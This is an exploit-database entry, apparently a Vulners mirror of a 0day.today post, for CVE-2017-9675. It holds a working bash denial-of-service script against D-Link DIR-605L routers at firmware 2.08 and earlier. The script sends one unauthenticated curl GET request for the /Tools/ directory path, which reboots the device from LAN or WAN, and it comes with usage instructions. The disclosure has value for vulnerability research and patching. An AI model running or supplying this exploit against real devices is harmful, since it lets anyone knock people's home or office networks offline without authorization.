Lucene search
K

DLink DIR-605L < 2.08 - Denial of Service Exploit

🗓️ 16 Nov 2017 00:00:00Reported by Enrique CastilloType 
zdt
 zdt
🔗 0day.today👁 32 Views

DLink DIR-605L <=2.08 Denial of Service Exploit via HTTP GET request handling bu

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2017-9675
15 Jun 201719:29
attackerkb
Circl
CVE-2017-9675
14 Nov 201700:00
circl
CNVD
D-Link DIR-605L Denial of Service Vulnerability
19 Jun 201700:00
cnvd
CVE
CVE-2017-9675
15 Jun 201719:00
cve
Cvelist
CVE-2017-9675
15 Jun 201719:00
cvelist
Exploit DB
D-Link DIR-605L &lt; 2.08 - Denial of Service
14 Nov 201700:00
exploitdb
exploitpack
D-Link DIR-605L 2.08 - Denial of Service
14 Nov 201700:00
exploitpack
NVD
CVE-2017-9675
15 Jun 201719:29
nvd
OpenVAS
D-Link DIR-605L < 2.08UIBetaB01 DoS Vulnerability
17 Nov 201700:00
openvas
Packet Storm
D-Link DIR605L 2.08 Denial Of Service
16 Nov 201700:00
packetstorm
Rows per page
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for 
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered 
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
 
if [ "$#" -ne 1 ]; then
    echo "usage: $0 <router_ip>"
    exit
fi
     
curl http://$ROUTER/Tools/

#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation